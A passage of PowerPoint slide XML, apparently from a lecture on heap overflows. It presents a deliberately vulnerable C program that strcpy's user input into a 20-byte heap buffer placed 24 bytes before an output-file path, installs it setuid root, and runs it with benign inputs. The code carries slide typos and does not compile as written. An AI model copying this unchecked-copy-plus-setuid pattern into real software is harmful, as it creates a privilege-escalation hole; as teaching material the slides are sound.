              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>userinput</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>malloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>[20];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>outputfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>malloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>[20];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>If (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>&lt;2)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>Printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>(“error”);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Exit(0);}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>Strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>outputfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>,”/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>/notes”);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>Strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>userinput,argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>[1]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>Printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>(“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>userinput</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
              <a:t> @%p:%s\n”,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>userinput,userinput</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>Printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>(“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>outputfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
              <a:t> @%p:%s\n”,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>outputfile,outputfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>(“distance between:%d\n”,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>outputfile-userinput</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>Printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>(“----------------------\n\n”);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1521918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58734CA0-54A9-4A4D-8C88-35E96E98E7C3}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>41</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69635" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69636" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="836613"/>
            <a:ext cx="7772400" cy="5106987"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>Printf(“writing to \”%s\”to the end of %s …\n”,userinput,outputfile);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>Fd=fopen(outputfile,”a”);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>If (fd==null)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>{fprint(stederr,”error opening %s\n”,outputfile);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>Exit(1);}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>Fprint(fd,”%s\n”,userinput);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>Fclose(fd);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>Return(0);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1573225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3C897381-1300-4C7C-8D10-4A105E6F58A0}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>42</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70659" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70660" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="1052513"/>
            <a:ext cx="7772400" cy="4891087"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0"/>
              <a:t>$gcc –o heap heap.c</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0"/>
              <a:t>$sudo chown root.root heap</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0"/>
              <a:t>$sudo chmod u+s heap</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0"/>
              <a:t>$./heap testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0"/>
              <a:t>Userinput @0x80498d0:testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0"/>
              <a:t>Outputfile @0x80498e8:/tmp/notes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0"/>
              <a:t>Distance between:24</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0"/>
              <a:t>-------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0"/>
              <a:t>Writing to “testing”  to the end of  /tmp/notes…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0"/>
              <a:t>$cat /tmp/notes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0"/>
              <a:t>testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3899167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B6CA4A17-1D05-459C-B843-9F54EB3718BB}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>43</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71683" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71684" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="971550" y="1125538"/>
            <a:ext cx="7772400" cy="4833937"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>$./heap 12345678901234567890123</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>Userinput @0x80498d0: 12345678901234567890123</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>Outputfile @0x80498e8:/tmp/notes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>Distance between:24</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>-------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>Writing to “12345678901234567890123”  to the end of  /tmp/notes…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>$cat /tmp/notes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>Testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>12345678901234567890123</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="237524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6E875681-274B-4412-8764-52D797EE7CD8}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>44</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72707" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72708" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="908050"/>
            <a:ext cx="7772400" cy="5035550"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
